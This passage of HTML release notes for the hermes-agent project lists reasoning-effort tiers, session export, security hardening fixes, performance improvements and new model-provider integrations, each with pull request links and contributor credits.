data-url="https://github.com/NousResearch/hermes-agent/issues/61578" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61578/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/61578">#61578</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60887" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60887/hovercard">#60887</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65913" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65913/hovercard">#65913</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64541" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64541/hovercard">#64541</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65472" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65472/hovercard">#65472</a>)</p>
</li>
<li>
<p><strong>Crank the thinking to max — new reasoning effort tiers and per-model control</strong> — Reasoning effort gained <code>max</code> and <code>ultra</code> levels (GPT-5.6 and Codex's top tiers), selectable everywhere from the CLI to the desktop, with sane clamping on providers with smaller scales. You can now also pin <strong>per-model reasoning-effort overrides</strong> in config, set <strong>per-slot effort in MoA presets</strong> (your advisors think hard, your synthesizer stays fast), and per-task effort for auxiliary models. Thinking depth is now a dial, not a global switch. (<a href="https://github.com/NousResearch/hermes-agent/pull/62650" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62650/hovercard">#62650</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64458" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64458/hovercard">#64458</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64631" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64631/hovercard">#64631</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64597" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64597/hovercard">#64597</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Your sessions, your data — export everything</strong> — <code>hermes sessions export</code> now writes Markdown, Quarto, HTML, prompt-only, and even Hugging Face-ready trace formats, with the full filter surface (age, workspace, platform), an opt-in <code>--redact</code> secret-scrubbing pass, and compacted-session lineage stitched into one logical export. Pair with the new prune filters and bulk archive to keep your session store tidy. Your conversation history is a real dataset now, not a black box. (<a href="https://github.com/NousResearch/hermes-agent/pull/60186" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60186/hovercard">#60186</a> salvaging <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/web3blind/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/web3blind">@web3blind</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60492" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60492/hovercard">#60492</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60507" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60507/hovercard">#60507</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59327" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59327/hovercard">#59327</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Security hardening round</strong> — This window closed a long list of credential-surface gaps: Vertex credentials scoped away from subprocess env and through profile secret scopes, media/vision/image-gen local-file reads routed through one shared credential-read guard, a webhook body-size-cap sweep across every aiohttp server, bot-token redaction in Telegram transport errors, Fireworks token prefixes added to the redactor, six P1 browser/MEDIA/.env hardening PRs salvaged in one pass, and CI hardened against untrusted-ref interpolation. (<a href="https://github.com/NousResearch/hermes-agent/pull/57660" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57660/hovercard">#57660</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/58709" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58709/hovercard">#58709</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59215" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59215/hovercard">#59215</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56582" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56582/hovercard">#56582</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57842" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57842/hovercard">#57842</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/srojk34/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/srojk34">@srojk34</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jquesnelle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jquesnelle">@jquesnelle</a>)</p>
</li>
</ul>
<hr>
<h2>⚡ Performance — the speed spine</h2>
<h3>First-turn latency (all platforms)</h3>
<ul>
<li><strong>~80% TTFT cut</strong> — Discord capability detection off the critical path (token-keyed 24h disk cache + background refresh), Ollama probe skipped for known non-Ollama providers, agent-init blocking work removed; cold submit→dispatch ~4.3s → ~0.9s (<a href="https://github.com/NousResearch/hermes-agent/pull/59332" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59332/hovercard">#59332</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Perceived-latency round 2</strong> — <code>display.show_reasoning</code> default ON (watch the model think instead of a spinner), per-token response-box painting with width-aware force-flush, prompt-build caching, mtime-cached timezone resolution (<a href="https://github.com/NousResearch/hermes-agent/pull/59389" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59389/hovercard">#59389</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Segment mixed tool batches to recover lost concurrency; drop per-call base64 re-serialization from request-size estimates (<a href="https://github.com/NousResearch/hermes-agent/pull/64460" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64460/hovercard">#64460</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67788" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67788/hovercard">#67788</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h3>Desktop speed wave</h3>
<ul>
<li>14× less splitter CPU via incremental block lexing for streaming markdown; virtualized review-pane diffs (no more full-Shiki freeze); snappy session switching on large transcripts; killed the layout-thrash cascade on session switch (<a href="https://github.com/NousResearch/hermes-agent/pull/67154" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67154/hovercard">#67154</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67818" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67818/hovercard">#67818</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65898" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65898/hovercard">#65898</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66033" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66033/hovercard">#66033</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Cut startup serialization + per-turn REST amplification; pre-warm profile backends and gateway sockets on hover intent; idle-mount boot-hidden panes; fast model picker + dialogs (<a href="https://github.com/NousResearch/hermes-agent/pull/66747" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66747/hovercard">#66747</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66347" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66347/hovercard">#66347</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67857" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67857/hovercard">#67857</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66470" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66470/hovercard">#66470</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Stop per-token sidebar + tool-row re-renders during streaming; stop eager JSON.stringify of every tool's args/result; scope tool-diff subscriptions; batch sidebar session slices into one profile-DB pass; targeted file-tree revalidation; rAF-coalesced sash resizes (<a href="https://github.com/NousResearch/hermes-agent/pull/67742" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67742/hovercard">#67742</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67842" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67842/hovercard">#67842</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67195" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67195/hovercard">#67195</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67245" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67245/hovercard">#67245</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67824" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67824/hovercard">#67824</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67838" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67838/hovercard">#67838</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67844" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67844/hovercard">#67844</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Systematized perf benchmark harness with trustworthy cold-start + first-token measurement, replacing 12 one-off scripts (<a href="https://github.com/NousResearch/hermes-agent/pull/67466" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67466/hovercard">#67466</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67697" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67697/hovercard">#67697</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h3>Everywhere else</h3>
<ul>
<li>TUI renders streamed markdown incrementally per block (<a href="https://github.com/NousResearch/hermes-agent/pull/67236" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67236/hovercard">#67236</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Skill discovery cached by scan signature; snapshot manifest builds ~5× faster; text prefilter before AST parse in tool discovery (<a href="https://github.com/NousResearch/hermes-agent/pull/61414" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61414/hovercard">#61414</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61131" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61131/hovercard">#61131</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63941" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63941/hovercard">#63941</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>)</li>
<li>Copy-on-write message prep instead of full deepcopy; model-metadata probe-cache cluster; gateway <code>session.resume</code> model + display history from one SELECT (<a href="https://github.com/NousResearch/hermes-agent/pull/61133" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61133/hovercard">#61133</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61368" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61368/hovercard">#61368</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67247" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67247/hovercard">#67247</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li><code>hermes update</code> skips npm install when Node manifests are unchanged; dashboard session-list payloads trimmed + messages paginated (<a href="https://github.com/NousResearch/hermes-agent/pull/61580" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61580/hovercard">#61580</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60883" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60883/hovercard">#60883</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Byte-stable gateway system prompts — pinned session-context render keeps the prompt cache alive across turns (<a href="https://github.com/NousResearch/hermes-agent/pull/67403" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67403/hovercard">#67403</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
</ul>
<h2>🏗️ Core Agent &amp; Architecture</h2>
<h3>Providers &amp; models</h3>
<ul>
<li><strong>Fireworks AI provider</strong> with cost estimation + cached picker price columns, promoted to <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3370551446" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/2" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/2/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/2">#2</a> in provider pickers (<a href="https://github.com/NousResearch/hermes-agent/pull/62593" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62593/hovercard">#62593</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65476" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65476/hovercard">#65476</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65214" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65214/hovercard">#65214</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>DeepInfra</strong> hardened integration; <strong>Upstage Solar</strong> provider (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4614488518" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/42231" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42231/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/42231">#42231</a> salvage) (<a href="https://github.com/NousResearch/hermes-agent/pull/63969" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63969/hovercard">#63969</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64541" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64541/hovercard">#64541</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li><strong>GPT-5.6 (Sol/Terra/Luna + Pro) end-to-end</strong> — context lengths, native/Codex catalogs, pricing, compaction caps across every route (<a href="https://github.com/NousResearch/hermes-agent/pull/61616" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61616/hovercard">#61616</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, building on <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rob-maron/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rob-maron">@rob-maron</a>)</li>
<li>grok-4.5 (GA) catalog + reasoning allowlist; kimi-k3 on Nous Portal + OpenRouter (kimi-k2.x retired) + K3 discovery on the Kimi Coding endpoint; claude-fable-5 / claude-sonnet-5 / fugu-ultra curated; GA tencent/hy3 (<a href="https://github.com/NousResearch/hermes-agent/pull/60887" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60887/hovercard">#60887</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65913" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65913/hovercard">#65913</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65922" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65922/hovercard">#65922</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56617" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56617/hovercard">#56617</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60943" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60943/hovercard">#60943</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Catalog-labeled silent default (GLM-5.2) + bare-provider <code>/model</code> cost-safe routing; LM Studio JIT load mode; adaptive thinking for Kimi-family Anthropic endpoints (<a href="https://github.com/NousResearch/hermes-agent/pull/64771" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64771/hovercard">#64771</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65472" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65472/hovercard">#65472</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67606" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67606/hovercard">#67606</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>GLM-5.2 native reasoning_effort controls; Gemini request-context improvements; extra HTTP headers for LLM API calls; per-client model routing on the API server (<a href="https://github.com/NousResearch/hermes-agent/pull/58884" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58884/hovercard">#58884</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61873" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61873/hovercard">#61873</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishal-dharm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishal-dharm">@vishal-dharm</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57038" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57038/hovercard">#57038</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57028" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57028/hovercard">#57028</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Claude Sonnet 5 fully wired</strong> — curated lists, intro pricing, and metadata across every route (<a href="https://github.com/NousResearch/hermes-agent/pull/67932" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67932/hovercard">#67932</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Hide providers you don't use</strong> — <code>enabled: false</code> per-provider flag + <code>excluded_providers</code> config scrub unwanted providers from <code>/model</code> pickers and built-in resolution (<a href="https://github.com/NousResearch/hermes-agent/pull/67971" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67971/hovercard">#67971</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Bedrock catalog wave: real context-window probing from the live endpoint, 1M-context rows for current-gen Claude + Fable, geo-prefix parity, versioned profile-ID pricing, Opus 4.8/4.7 rows (<a href="https://github.com/NousResearch/hermes-agent/pull/68007" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68007/hovercard">#68007</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67977" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67977/hovercard">#67977</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/68005" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68005/hovercard">#68005</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67976" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67976/hovercard">#67976</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>kimi-k3 rollout completed across Kimi-direct catalog surfaces with 1M context on canonical Kimi Coding endpoints (<a href="https://github.com/NousResearch/hermes-agent/pull/68108" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68108/hovercard">#68108</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Provider pickers: Qwen providers folded into one group row; collapsible provider groups in the desktop model picker; friendlier TUI model display grouping same-endpoint providers (<a href="https://github.com/NousResearch/hermes-agent/pull/67758" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67758/hovercard">#67758</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67904" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67904/hovercard">#67904</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67908" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67908/hovercard">#67908</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Reasoning &amp; MoA</h3>
<ul>
<li><code>max</code> + <code>ultra</code> effort levels across every surface and route (<a href="https://github.com/NousResearch/hermes-agent/pull/62650" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62650/hovercard">#62650</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Per-model reasoning_effort overrides via a unified resolution chokepoint; per-task auxiliary effort; per-slot MoA preset effort; session-scoped <code>/reasoning</code> in the CLI (<a href="https://github.com/NousResearch/hermes-agent/pull/64458" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64458/hovercard">#64458</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64597" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64597/hovercard">#64597</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64631" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64631/hovercard">#64631</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67946" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67946/hovercard">#67946</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>MoA: <code>reference_max_tokens</code> to cap advisor output and cut latency; per-preset fanout cadence (<code>user_turn</code> runs advisors once per user turn); stale presets surfaced without retries; half-filled preset saves rejected at the API boundary; aggregator resolves reasoning like an acting model (<a href="https://github.com/NousResearch/hermes-agent/pull/56756" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56756/hovercard">#56756</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57591" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57591/hovercard">#57591</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64756" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64756/hovercard">#64756</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Delegation, approvals &amp; the agent loop</h3>
<ul>
<li>Live subagent transcripts + durable background completions (see Highlights) (<a href="https://github.com/NousResearch/hermes-agent/pull/67479" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67479/hovercard">#67479</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63494" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63494/hovercard">#63494</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
